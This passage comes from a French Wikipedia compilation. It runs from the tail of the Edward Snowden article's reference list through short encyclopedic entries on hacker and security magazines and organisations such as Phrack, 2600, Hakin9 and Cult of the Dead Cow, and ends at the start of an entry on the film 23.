snowden-pekin-et-moscou-se-defendent-des-accusations-americaines_3436034_3222. html), Le Monde.fr avec AFP et Reuters, 25 juin 2013, mis à jour à 18:33

[85] http:/ / www. lefigaro. fr/ international/ 2013/ 06/ 27/ 01003-20130627ARTFIG00679-edward-snowden-dans-les-limbes-de-la-diplomatie. php

[86] http:/ / www. lemonde. fr/ technologies/ article/ 2013/ 06/ 28/ affaire-snowden-moscou-epingle-washington_3438433_651865. html

[87] http:/ / www. today. com/ video/ today/ 52338824

[88] http:/ / www. 20minutes. fr/ monde/ etats_unis/ 1181715-20130628-edward-snowden-pret-a-rentrer-etats-unis-sous-conditions-selon-pere

[89] http:/ / lci. tf1. fr/ monde/ amerique/ un-retour-possible-de-snowden-aux-usa-8068383. html

[90] http:/ / www. lemonde. fr/ europe/ article/ 2013/ 07/ 01/

pour-poutine-snowden-peut-rester-en-russie-s-il-cesse-de-faire-du-tort-aux-etats-unis_3439890_3214. html

[91] Communiqué de Wikileaks (http:/ / wikileaks. org/ Edward-Snowden-submits-asylum. html)

[92] Le Monde parle de l'extradition d'Edward Snowden (http:/ / www. lemonde. fr/ technologies/ article/ 2013/ 07/ 02/

snowden-accuse-obama-de-faire-pression-pour-obtenir-son-extradition_3440075_651865. html)

[93] http:/ / www. lesoir. be/ 273279/ article/ actualite/ monde/ 2013-07-02/ snowden-denonce-pressions-d-obama , a déclaré Edward Snowden dans un communiqué. , a-t-il ajouté.

[94] http:/ / www. lefigaro. fr/ flash-actu/ 2013/ 07/ 02/ 97001-20130702FILWWW00226-snowden-accuse-obama-de-faire-pression. php

[95] Libération, de nouvelles informations sur l'affaire Snowden (2 juillet 2013) (http:/ / www. liberation. fr/ monde/ 2013/ 07/ 01/ tolle-en-europe-apres-les-nouvelles-revelations-de-snowden_915017,)

[96] http:/ / www. lefigaro. fr/ international/ 2013/ 07/ 02/

01003-20130702ARTFIG00249-la-salve-desesperee-d-edward-snowden-contre-barack-obama. php

[97] http:/ / www. radio-canada. ca/ nouvelles/ International/ 2013/ 07/ 02/ 001-asile-politique-snowden-norvege. shtml

[98] http:/ / www. radio-canada. ca/ nouvelles/ International/ 2013/ 07/ 01/ 007-snowden-asile-russie. shtml

[99] http:/ / www. liberation. fr/ monde/ 2013/ 07/ 02/ snowden-a-demande-l-asile-dans-21-pays_915218

[100] http:/ / www. lepoint. fr/ monde/ snowden-imbroglio-diplomatique-autour-de-morales-03-07-2013-1690518_24. php [101] fhttp://www.lemonde.fr/ameriques/article/2013/07/03/bolivie-des-manifestants-s-en-prennent-a-l-ambassade-de-france_3441382_3222.html

[102] http:/ / www. lefigaro. fr/ international/ 2013/ 07/ 03/

01003-20130703ARTFIG00376-l-affaire-snowden-provoque-un-imbriglio-diplomatique-avec-la-bolivie. php

[103] http:/ / www. lemonde. fr/ ameriques/ article/ 2013/ 07/ 03/

une-rumeur-sur-snowden-provoque-une-crise-diplomatique-entre-paris-et-la-paz_3440849_3222. html

[104] http:/ / www. leparisien. fr/ international/ snowden-le-nicaragua-et-le-venezuela-accordent-l-asile-a-l-informaticien-06-07-2013-2959835. php

[105] http:/ / www. liberation. fr/ monde/ 2013/ 07/ 06/ le-venezuela-et-le-nicaragua-disposes-a-accueillir-snowden_916422

[106] http:/ / www. lepoint. fr/ monde/ le-venezuela-et-le-nicaragua-prets-a-accueillir-snowden-06-07-2013-1701180_24. php

[107] http:/ / www. cbsnews. com/ 8301-202_162-57592523/ edward-snowden-offered-asylum-in-bolivia-by-president-evo-morales/

[108] http:/ / www. liberation. fr/ monde/ 2013/ 07/ 07/ snowden-bloque-depuis-15-jours-dans-un-aeroport-de-moscou_916549

[109] http:/ / www. guardian. co. uk/ commentisfree/ 2013/ jul/ 10/ snowden-denies-information-russia-china

[110] http:/ / www. lemonde. fr/ technologies/ article/ 2013/ 07/ 10/

snowden-assure-n-avoir-donne-aucune-information-a-la-chine-ou-la-russie_3445696_651865. html

[111] http:/ / www. nytimes. com/ 2013/ 06/ 24/ world/ asia/ china-said-to-have-made-call-to-let-leaker-depart. html?hp& _r=2&

[112] http:/ / www. liberation. fr/ monde/ 2013/ 07/ 12/ snowden-demande-a-rencontrer-des-avocats-a-moscou_917785 Edward Snowden 422

[113] « Russie: Snowden rencontre des défenseurs des droits de l'homme » (http:/ / www. rfi. fr/ europe/ 20130712-russie-snowden-va-rencontrer-defenseurs-droits-homme), RFI avec RT Russian, 12 juillet 2013

[114] http:/ / www. 20minutes. fr/ monde/ 1188025-20130712-espionnage-edward-snowden-va-demander-asile-politique-a-russie

[115] « Edward Snowden demande l'asile politique à la Russie... pour mieux en partir » (http:/ / www. lemonde. fr/ technologies/ article/ 2013/

07/ 12/ edward-snowden-va-rencontrer-des-defenseurs-de-droits-de-l-homme_3446829_651865. html), Le Monde.fr avec AFP et Reuters, 12 juillet 2013

[116] Le FBI a lancé une enquête pénale sur Edward Snowden (http:/ / www. lemonde. fr/ technologies/ article/ 2013/ 06/ 13/

le-fbi-a-lance-une-enquete-penale-sur-edward-snowden_3429856_651865. html), Le Monde.fr avec l'AFP, 13 juin 2013

[117] Le FBI a lancé une enquête pénale contre Edward Snowden (http:/ / www. liberation. fr/ monde/ 2013/ 06/ 13/ le-fbi-a-lance-une-enquete-penale-contre-edward-snowden_910634), Libération.fr avec l'AFP, 13 juin 2013

[118] « Selon Obama, Prism est limité à l'antiterrorisme et au trafic d'armes » (http:/ / www. lemonde. fr/ europe/ article/ 2013/ 06/ 19/

selon-obama-prism-est-limite-a-l-antiterrorisme-et-au-trafic-d-armes_3432797_3214. html), Le Monde.fr avec l'AFP, AP et Reuters, 19 juin 2006

[119] Peter Finn et Sari Horwitz, U.S. charges Snowden with espionage (http:/ / www. washingtonpost. com/ world/ national-security/

us-charges-snowden-with-espionage/ 2013/ 06/ 21/ 507497d8-dab1-11e2-a016-92547bf094cc_story. html?hpid=z1. ), The Washingtonpost.com, 22 juin 2013

[120] Edward Snowden inculpé pour espionnage aux États-Unis (http:/ / www. lemonde. fr/ technologies/ article/ 2013/ 06/ 22/

edward-snowden-inculpe-pour-espionnage-aux-etats-unis_3434725_651865. html), Le Monde.fr avec Reuters, 22 juin 2013

[122] « Affaire Snowden : les États-Unis auraient aussi espionné l'UE » (http:/ / www. leparisien. fr/ international/

affaire-snowden-les-etats-unis-auraient-aussi-espionne-les-europeens-29-06-2013-2939689. php), Le Parisien.fr, 29 juin avec mise à jour le 30 juin 2013

[123] Interview de Daniel Cohn-Bendit dans le 7/9 de Patrick Cohen (http:/ / www. franceinter. fr/ emission-linvite-l-invite-d-inter-22) sur France Inter, le 3 juillet 2013.

[126] Esther Addley, (http:/ / www. guardian. co. uk/ media/ 2013/ jun/ 10/ julian-assange-praises-edward-snowden), Guardian.co.uk, 10 juin 2013

[127] « Edward Snowden a bien fait de fuir » (http:/ / www. courrierinternational. com/ article/ 2013/ 07/ 08/ edward-snowden-a-bien-fait-de-fuir), Courrier international.com avec The Washington Post et Daniel Ellsberg, 8 juillet 2013, consulté le 10 juillet 2013

[128] http:/ / www. huffingtonpost. com/ 2013/ 06/ 23/ edward-snowden-passport_n_3487156. html

[129] « La Bolivie "prête" à examiner une demande d'asile de Snowden » (http:/ / www. lemonde. fr/ technologies/ article/ 2013/ 07/ 02/

snowden-accuse-obama-de-faire-pression-pour-obtenir-son-extradition_3440075_651865. html), Le Monde.fr avec AFP et Reuters, 2 juillet 2013

[130] http:/ / www. nydailynews. com/ news/ world/ bolivian-president-joins-allies-offering-asylum-snowden-article-1. 1391712

[131] Affaire Snowden: de Hong Kong à l'Équateur, la patate chaude diplomatique (http:/ / www. lexpress. fr/ actualite/ monde/

affaire-snowden-de-hong-kong-a-l-equateur-la-patate-chaude-diplomatique_1260579. html), L'Express.fr avec Reuters, 24 juin 2013

[132] À Moscou, Edward Snowden brouille les pistes (http:/ / www. lemonde. fr/ ameriques/ article/ 2013/ 06/ 24/

l-equateur-examine-la-demande-d-asile-de-snowden_3435161_3222. html), Le Monde.fr avec l'AFP, 24 juin 2013

[133] http:/ / www. france24. com/ fr/ 20130630-equateur-renvoie-balle-russie-affaire-snowden-transfert-espionnage-etats-unis-prism

[134] http:/ / www. france24. com/ fr/ 20130706-venezuela-nicaragua-offrent-asile-edward-snowden-diplomatie

[135] http:/ / www. notretemps. com/ internet/ schulz-pe-exprime-sa-comprehension,i31901

[136] http:/ / rt. com/ usa/ nsa-leak-snowden-live-updates-482/

[137] « Marine Le Pen demande l'asile en France pour Edward Snowden » sur le site des Échos (http:/ / www. lesechos. fr/ entreprises-secteurs/

tech-medias/ actu/ reuters-00527441-marine-le-pen-demande-l-asile-en-france-pour-edward-snowden-573968. php) via Reuters.

[138] Interview de Jean-Luc Mélenchon sur BFM TV (http:/ / www. bfmtv. com/ video/ bfmtv/ politique/

melenchon-demande-lasile-politique-snowden-un-homme-bienfaiteur-30-06-133748/ ). [139] Alexis Corbière, « Donnons l’asile politique à Edward Snowden ! Le Conseil de Paris doit le nommer citoyen d’honneur ! » Parti de gauche

(http:/ / www. lepartidegauche. fr/ viedegauche/ article/ donnons-asile-politique-edward-snowden-le-conseil-paris-doit-le-nommer-citoyen-d-honneur-23959 site du).

[140] Communiqué sur le Écologie Les Verts (http:/ / eelv. fr/ 2013/ 07/ 01/

eelv-demande-a-francois-hollande-daccorder-lasile-politique-a-edward-snowden/ site d'Europe).

[141] http:/ / www. lemonde. fr/ technologies/ article/ 2013/ 07/ 02/ snowden-pourrait-il-obtenir-l-asile-politique-en-france_3440038_651865. html

[142] « Demande d'asile de M. Edward Snowden », Communiqué de presse de [[Manuel Valls (http:/ / www. interieur. gouv. fr/ Actualites/

Communiques/ Demande-d-asile-de-M. -Edward-Snowden)], ministre de l'Intérieur, 4 juillet 2013]

[143] http:/ / www. liberation. fr/ monde/ 2013/ 07/ 04/ paris-rejette-la-demande-d-asile-d-edward-snowden_915966

[144] Elise Vincent, « Si Snowden entre en France, "la police serait tenue de l'interpeller" selon le ministère de l'intérieur » (http:/ / www.

lemonde. fr/ technologies/ article/ 2013/ 07/ 04/ la-france-rejette-la-demande-d-asile-de-snowden_3442740_651865. html), 4 juillet 2013

[145] Maître Eolas, « Non, la France n’a pas refusé l’asile à Eward Snowden » (http:/ / www. maitre-eolas. fr/ post/ 2013/ 07/ 05/ Non,-la-France-na-pas-refuse-lasile-a-Eward-Snowden), sur le blog Journal d'un avocat, 5 juillet 2013 Edward Snowden 423

[146] http:/ / www. youtube. com/ watch?v=za1L8Zaiano

[147] http:/ / www. youtube. com/ watch?v=MwzMIsTUiao

[148] http:/ / www. lemonde. fr/ international/ infographie/ 2013/ 06/ 11/ le-programme-prism-en-une-infographie_3427774_3210. html

[149] http:/ / www. lefigaro. fr/ hightech/ 2013/ 06/ 09/

01007-20130609ARTFIG00159-les-geants-du-web-empetres-dans-des-accusations-d-espionnage. php

[150] http:/ / www. washingtonpost. com/ politics/ edward-snowden-says-motive-behind-leaks-was-to-expose-surveillance-state/ 2013/ 06/ 09/

aa3f0804-d13b-11e2-a73e-826d299ff459_story. html?

[151] http:/ / www. washingtonpost. com/ politics/ intelligence-leaders-push-back-on-leakers-media/ 2013/ 06/ 09/

fff80160-d122-11e2-a73e-826d299ff459_story. html

[152] http:/ / edition. cnn. com/ 2013/ 06/ 09/ politics/ nsa-leak-identity

[153] http:/ / www. guardian. co. uk/ world/ 2013/ jun/ 09/ edward-snowden-nsa-whistleblower-surveillance

• Portail des bases de données • Portail du renseignement • Portail de la sécurité informatique • Portail des États-Unis 424

14-Publications et sites web de référence

Misc

Cette page d’homonymie répertorie les différents sujets et articles partageant un même nom. __DISAMBIG__ MISC ou Misc peut faire référence à: • Minimal instruction set computer, une architecture processeur; • Multi-System & Internet Security Cookbook, un magazine français spécialisé dans la sécurité informatique; • misc., l'abréviation du mot anglais miscellaneous.

Hakin9

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Hakin9 - Comment se défendre est un magazine mensuel spécialisé dans la sécurité informatique. Il est publié par les éditions SW Press.

Notes • La dernière lettre, le chiffre 9, fait référence au "Leet speak" et doit se lire comme la lettre "g". • Contrairement au nom commun hacking, le titre de la publication ne comporte pas la lettre "c" devant le "k".

Lien externe • (fr) Site officiel du magazine Hakin9 [1]

• Portail de la presse écrite • Portail de l’informatique • Portail de la sécurité informatique • Portail de la sécurité de l’information

Références

[1] http:/ / hakin9. fr Phrack 425 Phrack

Phrack est un magazine électronique underground international de langue anglaise édité par et pour des hackers depuis 1985.

Le fer de lance de la contre-culture hacker N'importe qui peut proposer des articles à condition que ceux-ci traitent, dans l'esprit subversif du hacking underground, de la sécurité informatique, de hacking, de phreaking, de cryptologie, d'espionnage, d'émission radio, de programmation, d'idées anarchistes, de conspirations ou d'actualités. Il est généralement considéré comme le fer de lance technique de la mouvance hacker. Les fondateurs de ce magazine étaient deux hackers ayant pour pseudonymes Taran King et Knight Lightning (en). Plusieurs articles publiés dans Phrack sont restés mythiques, que ce soit au niveau de l'impact sur la mouvance underground hacker (comme le Manifeste du Hacker de The Mentor) ou au niveau de la découverte de failles dans des logiciels (tel « Smashing the stack for fun and profit » d'Aleph1, l'initiateur de la liste de diffusion Bugtraq, article qui reste aujourd'hui la référence en matière d'exploitation de vulnérabilités de type dépassement de tampon).

Le magazine C'est un magazine électronique édité sous la forme de fichiers texte ASCII 7 bits (un article par fichier) distribués en archive tar compressée (gzip) sous licence Copyleft. Les articles sont numérotés en hexadécimal. Quelques éditions ont été, de manière exceptionnelle, éditées sous forme papier pour être distribuées lors de grands événements internationaux (WhatTheHack, DEF CON, etc.). Chaque édition contient en général entre quinze et vingt articles, parmi lesquels certains reviennent systématiquement (introduction, Phrack World News, etc.) tandis que certains font partie de séries qui paraissent de manière plus irrégulière (Loopback, International Scenes, Phrack Prophile, etc.). L'introduction est un éditorial signé par l'équipe de rédaction du magazine (phrackstaff). Elle comprend également un sommaire des articles présentés, les remerciements, ainsi que les informations de contact (dont une clé publique OpenPGP). Les Phrack World News sont un ensemble de brèves collectées depuis la précédente publication. Les Loopback sont les réactions du lectorat parvenues jusqu'à l'équipe de rédaction, souvent accompagnées des commentaires de l'équipe. La série International Scenes permet à des hackers provenant de partout dans le monde de présenter l'état du mouvement hacker dans leurs pays respectifs. Le Phrack Prophile est une interview donnée par une personnalité du milieu hacker international.

Historique En plus de sa version électronique, le 63e numéro de Phrack a été publié sous forme papier lors des événements DEF CON (aux États-Unis) et WhatTheHack (aux Pays-Bas) durant l'été 2005[1],[2] (ce qui portait à trois le nombre de numéros publiés sous forme papier). La société d'imprimerie chargée de réaliser ces copies a finalement refusé d'exécuter cette tâche une semaine avant la distribution officielle à la conférence DEF CON, alors qu'elle s'apercevait du caractère illégal du magazine, mais deux étudiants américains en ont décidé autrement et ont permis la distribution de 200 copies durant l'édition 2005 de la conférence américaine. La publication aux Pays-Bas lors du regroupement de conférences WhatTheHack a pu se dérouler sans encombre. Phrack 426

Après l'édition 2005, le Phrack staff, l'équipe d'éditeurs responsable du magazine, cède sa place à une nouvelle génération de hackers. Espérant une nouvelle édition courant 2006-2007.

Le Cercle des Hackers Disparus (2007 - 2009) Le Phrack 64 est sorti officiellement le 27 mai 2007. Cette nouvelle édition met l'accent sur un retour aux sources, une renaissance de l'esprit du hacking. Pour la nouvelle équipe d'éditeurs, The Circle Of Lost Hackers, les dernières éditions s'éloignaient de plus en plus de l'esprit originel. Le deuxième numéro de cette équipe, soit le numéro 65, a été publié le 12 avril 2008 ; il continue sur la même lancée que le précédent, en revenant aux sources de la mouvance underground, et à celles de Phrack puisqu'il comprend également un article faisant le point sur les scènes underground nationales de certains pays, afin de faire surgir un certain renouveau. Le Phrack 66 est sorti le 11 juin 2009.

Les années 2010 La publication du Phrack 67, initialement annoncée pour le 11 juillet 2010[3], a été repoussée au mois d'août 2010[4], mais cette seconde annonce ne fut pas suivie d'effet. Finalement, le 11 novembre 2010, une troisième annonce promit la date du 17 novembre 2010, soit la date anniversaire des 25 ans du magazine ; cette date anniversaire fut respectée. Ce numéro est l'œuvre d'un nouveau comité d'édition, différent du Cercle des Hackers Disparus (qui aura donc publié trois numéros). Ce soixante-septième numéro, placé sous le signe de l'exploitation de bugs en espace utilisateur, a reçu un bon accueil, même si d'une part l'annonce de la présence du magazine lors d'une conférence organisée par et pour l'industrie de la sécurité informatique (Ruxcon), et d'autre part la publication d'un exploit zero day dans ProFTPd[5] sont des sujets de polémique. Le 15 décembre 2010, le Phrackstaff mit en ligne l'appel à contribution du Phrack 68[6], annonçant le 15 mai 2011 comme date limite pour les propositions d'articles. Ce numéro est finalement publié le 14 avril 2012.

Anecdotes • Le système Gentoo (distribution logicielle basée sur le système GNU et le noyau Linux) dispose d'un paquetage Phrack permettant, en utilisant le système Portage, de télécharger au choix l'intégralité de tous les numéros (paquetage phrack-all [7]) ou les numéros que l'utilisateur juge intéressants (paquetage phrack [8]). La commande emerge phrack-all, lancée en tant qu'utilisateur root, récupère l'intégralité des numéros de Phrack.

Références

[1] http:/ / news. cnet. com/ Long-lived-hacker-mag-shuts-down/ 2100-7349_3-5783383. html

[2] http:/ / wiki. whatthehack. org/ index. php/ Phrack_Release

[3] Random #012 (https:/ / lille. dg-sc. org/ random/ index. php?post/ 2010/ 03/ 30/ Random-012)

[4] Random #018 (https:/ / lille. dg-sc. org/ random/ index. php?post/ 2010/ 07/ 05/ Random-018)

[5] ProFTPD with mod_sql pre-authentication, remote root (http:/ / www. phrack. org/ archives/ 67/ p67_0x07_ProFTPD with mod_sql

pre-authentication, remote root_by_FelineMenace. txt) par le groupe FelineMenace

[6] Appel à contribution du Phrack 68, 15 décembre 2010. (http:/ / www. phrack. org/ cfp_p68. txt)

[7] http:/ / www. gentoo-portage. com/ app-doc/ phrack-all

[8] http:/ / www. gentoo-portage. com/ app-doc/ phrack Réseaux & Télécoms 427 Réseaux & Télécoms

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Réseaux & Télécoms (R & T) est un magazine d'informatique français, spécialisée en réseaux et télécommunications d'entreprise publié par la filiale française du groupe IDG (éditeur du Monde informatique). R & T traite aussi l'actualité de la sécurité informatique et des systèmes d'information.

Hackademy Magazine

Cet article est une ébauche concernant la presse écrite et la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

The Hackademy Magazine est une publication bimestrielle française traitant de hacking en général et de sécurité informatique. Le logo est un chapeau blanc (white hat), signifiant que le magazine a fait le choix de diffuser des techniques en accord avec la loi française. Le journal est édité par la société DMP dont le Directeur de Publication est Olivier Spinelli. Il a fondé le magazine avec Tommy Lee sous le nom de Hackerz Voice. Ils ont rapidement été rejoints par Fozzy en tant que Directeur de Rédaction. C'est suite à l'arrestation des principaux membres de la société pour avoir été sur le point de dévoiler des faiblesses dans les principaux systèmes bancaires français que le journal a changé sa ligne éditorial pour devenir The Hackademy Journal et The Hackademy Manuel. L'action de la publication se décline aussi sous la forme d'une école : The Hackademy School, et d'un site Internet : The Hackademy Web.

Principes du magazine Le magazine obéit à quatre principes fondateurs : la légalité, l'indépendance, la communication, l'Équité. Cela est à mettre en parallèle avec les principes des logiciels libres. Alors que le copyleft permet de redistribuer des copies, le Hackademy Magazine est protégé par un copyright. Mais Hackademy Magazine, à dominante technique, répond aussi à une vocation plus culturelle. Toujours sous l'angle du "hacking", le magazine considère que la technique pure perd une partie de son sens si elle n'est pas ancrée dans la société. Sans parler d'hacktivisme, Hackademy Magazine propose aussi à ses lecteurs l'état d'esprit du hacking comme grille de lecture des questions de société, économiques et politiques dans un esprit de liberté, de tolérance et surtout d'ouverture. Fin 2006, le magazine, victime de la crise de la presse papier, mais surtout de l'acharnement des autorités à vouloir empêcher sa publication par tous les moyens, est contraint de s'arrêter. Le site Internet de l'Hackademy, avec son forum particulièrement actif, continue toutefois de maintenir en alerte cet esprit de liberté unique dans le paysage internet francophone. Hackademy Magazine 428

Liens externes • Site officiel de The Hackademy [1]

• Portail de la presse écrite • Portail de l’informatique • Portail de la sécurité de l’information • Portail de la sécurité informatique

Références

[1] http:/ / www. thehackademy. net

Die Datenschleuder

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Die Datenschleuder. Das wissenschaftliche Fachblatt für Datenreisende est un magazine hacker allemand qui est édité quatre fois par an par le Chaos Computer Club (CCC). Le magazine traite principalement les aspects politiques et techniques du monde numérique (et des libertés individuelles), de la protection de la vie privée, de cryptographie. Die Datenschleuder a été publié pour la première fois en 1984.

Liens internes •• 2600: The Hacker Quarterly •• Phrack •• Cult of the Dead Cow •• Hacking •• Sécurité des systèmes d'information

Liens externes • (de) Datenschleuder website, German (ISSN: 0930-1054) [1] • (de) Various Datenschleuder issues in PDF format [2]

• Portail de la presse écrite • Portail de la sécurité informatique • Portail de la sécurité de l’information • Portail de l’Allemagne

Références

[1] http:/ / ds. ccc. de/

[2] http:/ / ds. ccc. de/ download. html 2600: The Hacker Quarterly 429 2600: The Hacker Quarterly

2600: The Hacker Quarterly est un magazine trimestriel américain fondé en 1984 et traitant des sujets liés au monde du hacking.

Le magazine 2600: The Hacker Quarterly se spécialise dans la publication d'informations techniques sur les systèmes d'aiguillage téléphonique, le chiffrement des communications satellitaires, ainsi que des nouvelles sur l'underground du monde de l'informatique. Ce magazine est publié et édité par Emmanuel Goldstein (un nom de plume d'Eric Corley) et son entreprise, 2600 Enterprises, Inc. Le nom du magazine vient de la découverte dans les années 1960 que la transmission d'une tonalité de 2600 hertz sur une connexion interurbaine donnait accès à un « mode opérateur » et permettait à l'usager d'explorer des aspects du système téléphonique qui n'étaient pas autrement accessibles (c'est le principe du fonctionnement de la blue box). C'est John Draper qui a découvert qu'on pouvait produire cette tonalité parfaitement avec un sifflet en plastique donné gratuitement avec les céréales Cap'n Crunch (Capitaine Crounche).

Les meetings Depuis les années 1980, les lecteurs du magazine ont pris l'habitude de se réunir régulièrement, afin de discuter des différents sujets traités dans le magazine[1]. Ces meetings 2600 sont des meetings informels et non-officiels, se déroulant chaque premier Vendredi du mois, dans de nombreuses villes du monde[2], en suivant des directives officielles édictées par le magazine[3]. Il s'agit de meetings dont les participants se réunissent spontanément, sans organisation particulière et sans soutien associatif ; ils suivent simplement les quelques directives officielles. Le magazine publie dans chaque numéro la liste des meetings actifs, et les informations s'y rapportant, notamment l'heure et le lieu des rendez-vous. Bien que fortement liés au milieu underground hacker, ces meetings se veulent ouverts à toutes et à tous, sans distinction d'âge, de compétence ou d'intérêt. Le but de ces meetings est de fournir un cadre pour parler de sujets dont on n'a pas forcément souvent l'occasion de parler, par exemple la sécurité des nouvelles technologies de l'information et de la communication, ou encore l'impact de ces technologies sur notre société[4]. En France, il existe plusieurs meetings 2600, à Paris, Rennes, Lille, Rouen, Toulouse, et Strasbourg[5]. Au Québec, les réunions du 2600 ont lieu à Montréal[6].

Projets liés 2600 a organisé les conférences H.O.P.E. (Hackers on Planet Earth — Des hackers sur la planète Terre). 2600 Films a réalisé un film documentaire intitulé Freedom Downtime qui porte sur le célèbre hacker Kevin Mitnick, sur le mouvement Free Kevin (Libérez Kevin) et sur le monde des hackers. De plus, 2600 a été impliqué dans plusieurs causes judiciaires reliées à la technologie et la liberté d'expression, en collaboration avec la Electronic Frontier Foundation. Corley anime aussi les émissions de radio Off The Wall et Off the Hook, à partir de New York. Les deux émissions peuvent être téléchargées à partir du site Web de 2600. 2600: The Hacker Quarterly 430

Références

[1] Random #018 (https:/ / lille. dg-sc. org/ random/ index. php?post/ 2010/ 07/ 05/ Random-018)

[2] http:/ / www. 2600. com/ meetings/ mtg. html

[3] http:/ / www. 2600fr. net

[4] http:/ / www. lavoixdunord. fr/ Locales/ Lille/ actualite/ Secteur_Lille/ 2010/ 08/ 07/ article_les-bidouilleurs-des-reacs-ferus-de-nouv. shtml

[5] 2600fr.net (http:/ / www. 2600fr. net)

[6] mtl2600.org (http:/ / www. mtl2600. org)

Cult of the Dead Cow

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Cult of the Dead Cow

Création 1984

Type Association à but non lucratif

Siège Lubbock, Texas, États-Unis

Affiliation(s) Hacktivismo

Site web [1] (en) Site officiel

[2] modifier

Cult of the Dead Cow, ou cDc, est une organisation hacker et un média de masse « Do it yourself » fondée en 1984 à Lubbock au Texas aux États-Unis[3]. Elle est connue pour avoir, entre autres, créé plusieurs outils, destinés à la fois aux hackers, aux administrateurs système, et au grand public, comme Back Orifice. Ce nom vient d'une expression utilisée par le premier ministre chinois Li Peng pour décrire les Droits de l'homme[]. Cult of the Dead Cow 431

Notes et références

[1] http:/ / cultdeadcow. com/

[2] http:/ / fr. wikipedia. org/ w/ index. php?title=Cult_of_the_Dead_Cow& action=edit& section=0

Annexes

Articles connexes •• Die Datenschleuder •• 2600: The Hacker Quarterly •• Phrack •• Hacking •• Hacker (sécurité informatique) •• Sécurité des systèmes d'information

Liens externes

• Site officiel (http:/ / www. cultdeadcow. com/ )

• Portail de la sécurité informatique • Portail de la sécurité de l’information Le Virus informatique

Pour l’article homonyme, voir Virus informatique pour le logiciel malveillant. Le Virus informatique est un magazine d'actualités francophone sur le monde de l'informatique à parution erratique publié par ACBM fondée par Olivier Aichelbaum. Sa principale caractéristique est d'avoir toujours refusé de s'ouvrir aux annonceurs afin d'assurer son indépendance. Le journal, parfois comparé à Hebdogiciel, a connu plusieurs épisodes de cessation de parution. En effet, la commission paritaire qui donne le droit de publication afin de bénéficier de la TVA réduite et d'une réduction sur les tarifs postaux, a retiré plusieurs fois l'agrément pour l'une ou l'autre des publications d'ACBM[1],[2]. La dernière en date a été le retrait de l'agrément pour le magazine Pirates Mag, auquel la commission reprochait d'inciter au piratage informatique et ne présenterait pas de caractère d'intérêt général. Le magazine avertissait pourtant des peines encourues en cas de piratage. La revue a fait un recours devant le Conseil d'État contre la décision de la commission paritaire mais le recours a échoué[3]. Finalement, la rédaction a décidé de publier à nouveau le journal Pirates Mag avec le sous-titre comment s'en protéger et de faire une nouvelle demande de numéro de commission paritaire qui a été acceptée. Le Virus informatique 432

Autres publications • Les Puces informatiques : informations sur les vieux ordinateurs et petites annonces gratuites. • Pirates Mag': informations sur les failles de sécurité, risques viraux ou autres. • Pocket Videogames : informations sur les consoles de poche.

Notes et références

[1] Par exemple, pour Le Virus informatique, en raison d'un délai trop important entre deux numéros: Laure Noualhat, « Les bugs à répétition plantent "le Virus" », Libération, 11 août 2000

[2] « Pirates Mag’: les documents que le Premier Ministre nous cachait! », article paru dans Le Virus Informatique 26 (juin 2004) (http:/ / www.

acbm. com/ virus/ num_26/ pirates-magazine-cppap. html) [3] CE 10 mars 2004, n°254110; concl. Boissard BDCF 6/04 n°75 - conclusions communes aux arrêts du même jour relatifs aux publications Hackerz Voice (n°255917, SARL DMP), revue également consacrée au piratage informatique, et Graff It (n°255284, Société Graff It Productions)

SANS Institute

Pour les articles homonymes, voir SANS. Le Sans Institute (SysAdmin, Audit, Network, Security) est une organisation regroupant 165 000 professionnels de la sécurité (consultants, administrateurs système, universitaires, agents gouvernementaux …) ayant pour but de mutualiser l'information concernant la sécurité des systèmes d'information. Le Sans Institute est également une université de formation aux technologies de sécurité. Elle apparait comme une référence dans la presse spécialisée.

Annexes

Liens externes • (en) Sans Institute [1] • (en) Université du Sans Institute [2]

• Portail de l’informatique • Portail de la cryptologie • Portail de la sécurité de l’information

Références

[1] http:/ / www. sans. org/

[2] http:/ / www. sans. edu SecurityFocus 433 SecurityFocus

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

SecurityFocus est un site web anglophone de référence, consacré à la sécurité informatique. Il héberge un système de suivi de bugs et des vulnérabilités trouvés, plusieurs listes de diffusion sur la plupart des technologies liées à la sécurité, et publie des offres d'emploi. SecurityFocus a été acheté par la société Symantec en 2002, éditrice de Norton Antivirus[1].

Notes et références

[1] Acquisitions (http:/ / www. symantec. com/ about/ profile/ development/ acquisitions/ index. jsp), Symantec.com 434

15-Romans et films

23 (film)

Cet article est une ébauche concernant un film allemand. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les conventions filmographiques.

Pour les articles homonymes, voir Vingt-trois. 23 est un film allemand réalisé par Hans-Christian Schmid, sorti en 1998.

Synopsis L'histoire se passe à Hanovre, en Allemagne, durant les années 1980, et s'inspire d'une histoire vraie. Karl Koch est un jeune hacker de génie. Les romans de l'écrivain Robert Anton Wilson nourrissent l'esprit torturé du jeune homme, qui se persuade de l'existence d'une dangereuse société secrète : les Illuminati. Karl et plusieurs amis participent au Chaos Computer Club, qui pirate les réseaux informatiques de grandes entreprises, dans un idéal de partage général des informations. Notre héros entre bientôt en contact avec le KGB pour livrer des informations volées, afin de maintenir l'équilibre des forces entre États-Unis et Union soviétique dans la guerre froide. Mais, mal entouré, talonné par des ennuis financiers et la toxicomanie, il exécute bientôt ses missions d'espionnage industriel pour l'argent seul. Au fil de l'intrigue, Karl se montre de plus en plus obsédé par le nombre 23, qu'il voit comme la signature de la secte des Illuminati. Cette obsession lui fait peu à peu perdre le sens des réalités.

Fiche technique • Réalisation : Hans-Christian Schmid • Scénario : Hans-Christian Schmid, Michael Gutmann et Michael Dierking. •• Couleur : Couleur • Format de production : 1 h 39 (et une minute de plus dans la version présentée au festival international du film de Mar del Plata en Argentine).

Distribution •• August Diehl •• Fabian Busch •• Dieter Landuris •• Jan Gregor Kremp

